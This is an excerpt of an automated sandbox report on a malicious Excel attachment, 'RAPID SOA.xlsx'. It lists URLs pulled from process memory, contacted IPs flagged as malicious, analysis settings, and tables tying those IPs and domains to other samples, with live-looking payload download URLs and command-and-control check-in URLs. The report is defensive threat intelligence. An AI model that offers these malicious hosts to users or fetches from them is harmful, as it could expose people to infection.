                          http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://search.ebay.de/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mtv.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.rambler.ru/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://buscar.ya.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2181552252.0000000004B50000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://asp.usatoday.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://rover.ebay.comexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://search.ebay.in/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://msk.afisha.ru/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.rediff.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.google.ru/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.daum.net/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://buscar.ozu.es/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.about.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.ask.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.cjmall.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.centrum.cz/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://suche.t-online.de/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.google.it/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.amazon.de/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2187801380.000000000861C000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://investor.msn.com/explorer.exe, 00000006.00000000.2179952602.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.espn.go.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://service2.bfast.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.%s.comPAexplorer.exe, 00000006.00000002.2380112198.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      low
                                                                                                                                                      http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.news.com.au/favicon.icoexplorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://www.cdiscount.com/explorer.exe, 00000006.00000000.2191611814.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high

                                                                                                                                                          Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          103.125.191.208
                                                                                                                                                          unknownViet Nam
                                                                                                                                                          135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                          184.168.131.241
                                                                                                                                                          unknownUnited States
                                                                                                                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                          184.154.206.199
                                                                                                                                                          unknownUnited States
                                                                                                                                                          32475SINGLEHOP-LLCUStrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                          Analysis ID:344819
                                                                                                                                                          Start date:27.01.2021
                                                                                                                                                          Start time:07:58:03
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 10m 47s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:light
                                                                                                                                                          Sample file name:RAPID SOA.xlsx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                          Number of analysed new started processes analysed:9
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.expl.evad.winXLSX@9/6@5/3
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 27.1% (good quality ratio 26%)
                                                                                                                                                          • Quality average: 71.4%
                                                                                                                                                          • Quality standard deviation: 28.9%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          Warnings:
                                                                                                                                                          Show All
                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                          • TCP Packets have been reduced to 100
                                                                                                                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344819/sample/RAPID SOA.xlsx

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          07:59:13API Interceptor79x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          07:59:16API Interceptor49x Sleep call for process: vbc.exe modified
                                                                                                                                                          07:59:34API Interceptor224x Sleep call for process: systray.exe modified
                                                                                                                                                          08:00:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          103.125.191.208COSU6283389840.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • chise2neversndywalka.dns.army/chnsfrnd2/winlog.exe
                                                                                                                                                          SD 1476187 85250296 MV ORIENT GLORY.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • neverstdywalkachine2.dns.navy/chnsfrnd2/winlog.exe
                                                                                                                                                          TT Payment - 105,272.40.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • neverstdywalkachine2.dns.navy/chnsfrnd2/winlog.exe
                                                                                                                                                          Alfa Laval Aalborg AS Statement of Account.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • wsdyneverwalkachine2.dns.navy/chnsfrnd2/winlog.exe
                                                                                                                                                          RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • wsdyneverwalkachine2.dns.navy/chnsfrnd2/winlog.exe
                                                                                                                                                          RFQ.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • nevermndywalkachine2.dns.army/chnsfrnd2/winlog.exe
                                                                                                                                                          REQUEST FOR QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • nevermndywalkachine2.dns.army/chnsfrnd2/winlog.exe
                                                                                                                                                          184.168.131.241v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.parkdaleliving.com/c8so/?3ff87=cEUYti5cL+AXNxPbfx60LfZoJb25X1Xzf5mF7VOL6mQ/zZpS24NGTSz6B6bhvYiv88T+&uZWD=XPmPajepJ2gdvnZ
                                                                                                                                                          winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                          • www.digitalcreativeclass.com/oean/?8pNhXv=yVML0zB0&u4XpH=6sgdKtavC7V87+oTFKoxaa5O0zjTcMbm8vcjcmphVoVHfmTvOtd6UrCYUSHuOogI1kkIR2YmoA==
                                                                                                                                                          win32.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.xn--lmsealamientos-tnb.com/incn/?8pBP5p=wf+rV5DOYsMJpa4g9XLDiATljpns8YCBV86prGMq2zSxEqUEQI9j0Vbx28h0R1RpmAu9&L6Ah=2dSLFXghYtFd0
                                                                                                                                                          order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.healthywithhook.com/n7ak/?uTuD=UF4jhC9GOQChisniHC1kg0CjCBTohJaid9vkoIR2Qf4yQeaQ94Q33rP15fTgpArs+ngL&Ulm=9rCT5lUPVnAlWPi0
                                                                                                                                                          bgJPIZIYby.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.twistedtailgatesweeps1.com/bw82/?GFND=kKEA6YkkdkETd3+d2qZ9bmPUSI4mVgzFcDmo6tctb+5KXtaTIOiEE2GUo6ELQ3o02C3x&Rlj=YVIX8Hyx
                                                                                                                                                          message_zdm.htmlGet hashmaliciousBrowse
                                                                                                                                                          • outlook-offlce-com.irvineairflights.org/
                                                                                                                                                          SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.garethjamesproperties.com/cdl/?Et08qv=2ovCVTXv68Pt4ijpLk8HPqbw25DfYgJSfH6hGLZ/BiAdoxLe5mSyhZEbepZ3N+ZDM0I2&uXK=hpgd6NmPQLRDNXK
                                                                                                                                                          message_zdm.htmlGet hashmaliciousBrowse
                                                                                                                                                          • myaccount-office-message.irvinebusinessfly.com/
                                                                                                                                                          Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.metamorphosiswei.com/9bwn/?FTChYV9=PjBOtfKyZi0MVy8KTAOZ6es/s7g6bZ/sUd6s5qyy+y2zh4u+ZehjfLQuVlmfdl/uWDwB70KU+Q==&uzuD=ZlmPdLR82nZ
                                                                                                                                                          INV120294624.htmlGet hashmaliciousBrowse
                                                                                                                                                          • isb-sharepoints.irvineairflight.com/
                                                                                                                                                          G0ESHzsrvg.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.100feetpics.com/8rg4/?Ktx=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mMDQv4y9//uuqNWBXw==&OtNDOP=wXOLMFD0PT3lc
                                                                                                                                                          hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.twistedtailgatesweeps1.com/bw82/?AjR=kKEA6YkkdkETd3+d2qZ9bmPUSI4mVgzFcDmo6tctb+5KXtaTIOiEE2GUo5kbfW4Mone2&ndnDnN=-Zh4gtKhzFrx
                                                                                                                                                          NEW AGREEMENT 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.lakegastonautoparts.com/bw82/?h4XX=ADKhg6&d480GxR0=juBLB0WtueK0EvdRqiaKUMHcPI3xC2bTDg9jeDe0t8cj29/tW+mLTC2Yjrpt+W5wd622IA==
                                                                                                                                                          Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.magnabeautystyle.com/bw82/?KPO0Ltt0=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w==&GzuD_=dp5pdVbpjd
                                                                                                                                                          JK981U7607.docGet hashmaliciousBrowse
                                                                                                                                                          • trainwithconviction.com/wp-admin/y/
                                                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.pnwfireextinguishers.com/incn/?t8o=sCl40OkbCTlpMn8nDVKtc7exPuvy+8BigTFOlzhHVo8rCf1OKnKgPL2L2vkPzdoEVatq&TjX=YvIT_
                                                                                                                                                          SecuriteInfo.com.Trojan.PackedNET.507.15470.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.microwgreens.net/gqx2/?t6Al=7RaLHwCMUMujiCZTFv81tpuDgIdMwwaUpFkTs3uacfnBr+tZ14+SJ7n3FmpwAcExjbOA&kPm0q=J4kl
                                                                                                                                                          ChTY1xID7P.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.hlaprotiens.com/8rg4/?GFNP=OYDJLuueaFXNtOwihDRdfsH5NtUxWUpjnhyJYIgTyqexCACRaAwflaXc/5f6y5znDp4n&Rl7=XPv4nRgx
                                                                                                                                                          Sales Contract_20210113.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.microwgreens.net/gqx2/?Ab=7RaLHwCJULuniSVfHv81tpuDgIdMwwaUpF8Dw0ybY/nArPBfyovef/f1GAl2LtQ62963Dg==&oBZ4Uz=D0Dl7fO
                                                                                                                                                          SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203 _ 19-028-MP-010203.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.insuranceforgrass.com/cdl/?uHux=fdfLuzbHl&xBkpfvSp=A1H4xQi7nCm4dsaHHTQB+ENJ75eaR8btr5AllEXDgRUKTVrPlhERhFG7xWxWp9ft1f2F

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          chise2neversndywalka.dns.armyCOSU6283389840.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 103.125.191.208

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          AS-26496-GO-DADDY-COM-LLCUS0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 166.62.29.42
                                                                                                                                                          quote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                          • 107.180.2.197
                                                                                                                                                          ARCH_25_012021.docGet hashmaliciousBrowse
                                                                                                                                                          • 192.169.223.13
                                                                                                                                                          Informacion.docGet hashmaliciousBrowse
                                                                                                                                                          • 166.62.10.32
                                                                                                                                                          v07PSzmSp9.exeGet hashmaliciousBrowse
                                                                                                                                                          • 198.71.232.3
                                                                                                                                                          winlog(1).exeGet hashmaliciousBrowse
                                                                                                                                                          • 184.168.131.241
